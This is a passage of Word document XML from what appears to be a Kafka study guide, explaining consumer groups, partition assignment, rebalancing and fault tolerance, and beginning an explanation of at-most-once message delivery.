            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E3A6E0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629D028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6B258B61" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56E2DE9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Group of consumers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58811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ork together to consume topic data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="0F216F8D" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A61066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partition per consumer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17400C3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sures load balancing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="5668B325" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10C1385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ed per group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F9AF2F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s replay or resume</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="70AD2EF2" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09AD67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balancing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C5980C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ppens when consumers join or leave the group</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3EEEFB04"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3372" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EB6815" w14:textId="0681AF9F"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832" w:name="_Toc197868046"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain the concept of a Kafka consumer group and how it allows multiple consumers to scale and consume messages from topics</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="832"/>
    </w:p>
    <w:p w14:paraId="60EC095C" w14:textId="1DEB530D" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805"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Consumer Group – Concept &amp; Scaling Explained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A30031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powerful mechanism in Apache Kafka that enables </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scaling and parallel consumption</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of data across multiple consumers. It ensures that the </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>load is distributed</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and each message is </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>processed only once per group</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF335B6"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AF16CF">
          <v:rect id="_x0000_i3373" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5360755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Consumer Group?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36824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group of one or more consumer instances that </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cooperate to consume messages</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from one or more Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB3F05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is assigned </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a unique subset of partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1819296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no two consumers in the same group</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> consume data from the </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same partition simultaneously</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18572E4A"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ADF5C">
          <v:rect id="_x0000_i3374" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="639791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8BEFD17"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t’s say we have a topic logs with 4 partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620037B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 logs-1, logs-2, logs-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D674C7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08837511" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EEC4B6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A15FC79"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0773EFE6" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="362ECF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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CCC5F6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49B9648E" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05C6EE0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logs-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BA5264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05171470" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="685366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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="628AE24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1A72EB8" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6177B5F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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="488CEE8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bl>
    <w:p w14:paraId="65B830D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Each consumer reads messages from the assigned partitions </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>in parallel</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, increasing throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6636ACCD"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27B64B">
          <v:rect id="_x0000_i3375" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A90289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Allows Scaling?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6772D757"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dd more consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the group → Kafka rebalances partitions → More parallelism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBC094F"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ximum number of active consumers ≤ Number of partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BDFA56"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crashes, Kafka </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reassigns partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to other consumers → </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fault tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3978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94E56">
          <v:rect id="_x0000_i3376" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD1B13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522"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="7FE657C6" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0088E44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1EAA21FB"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0D1EE14D" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42C2381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ad Balancing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FEF5F1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istributes partitions across consumers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="286AA3F2" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74B5FD7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orizontal Scaling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04C8DA4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 consumers to process more data in parallel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="517E5A22" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E203FB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ault Tolerance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5638862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a consumer dies, others take over its work</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="2376B71F" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7754A26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ing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04E6C09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stores offset </w:t>
            </w:r>
            <w:r w:rsidRPr="008E5BA7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>per group per partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="469C4D05" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C5BF36F"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essage Guarantee</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E96B4A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message is read by </w:t>
            </w:r>
            <w:r w:rsidRPr="008E5BA7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>one consumer per group</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75438C0F"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F1315">
          <v:rect id="_x0000_i3377" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B61141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eal-World Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164C548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have a topic orders with 6 partitions, and a consumer group order-processors with 3 consumers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095486C8"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will process 2 partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC36D2B"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one fails, the remaining 2 will pick up the work (after </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rebalance</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063FBB2E"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ing a 4th consumer won’t help unless the number of partitions &gt; consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FC7BCC"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3378" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7543E5D8" w14:textId="31EA94CC" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00025820" w:rsidP="00025820">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="833" w:name="_Toc197868047"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain the </w:t>
      </w:r>
      <w:r w:rsidR="005C46F6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>three-message</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> delivery guarantees in Kafka and how they are implemented</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="833"/>
    </w:p>
    <w:p w14:paraId="04DFC24B" w14:textId="41F42DC6" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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Message Delivery Guarantees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172D6E0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rovides three primary </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message delivery guarantees</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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ere are the three message delivery guarantees:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41692051"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C0E53F">
          <v:rect id="_x0000_i3379" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7909A22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 Delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019DE2F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delivery, messages may be </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lost</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never delivered more than once</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. If a failure occurs while sending the message, the producer will </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not retry</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sending it, and the message will be lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21191E3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5BA9AAFB"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retries</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the producer fails to get an acknowledgment from the broker, it doesn’t retry sending the message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17113398"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This guarantee ensures there are no duplicates but may result in some messages being dropped (lost).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F50645"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This is suitable for logging or stateless systems where message loss can be tolerated and is preferable to duplicate messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FE337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0E0886F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       # No acknowledgment is required from the broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782E707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    # No retry on failure.</w:t>
      </w:r>
    </w:p>
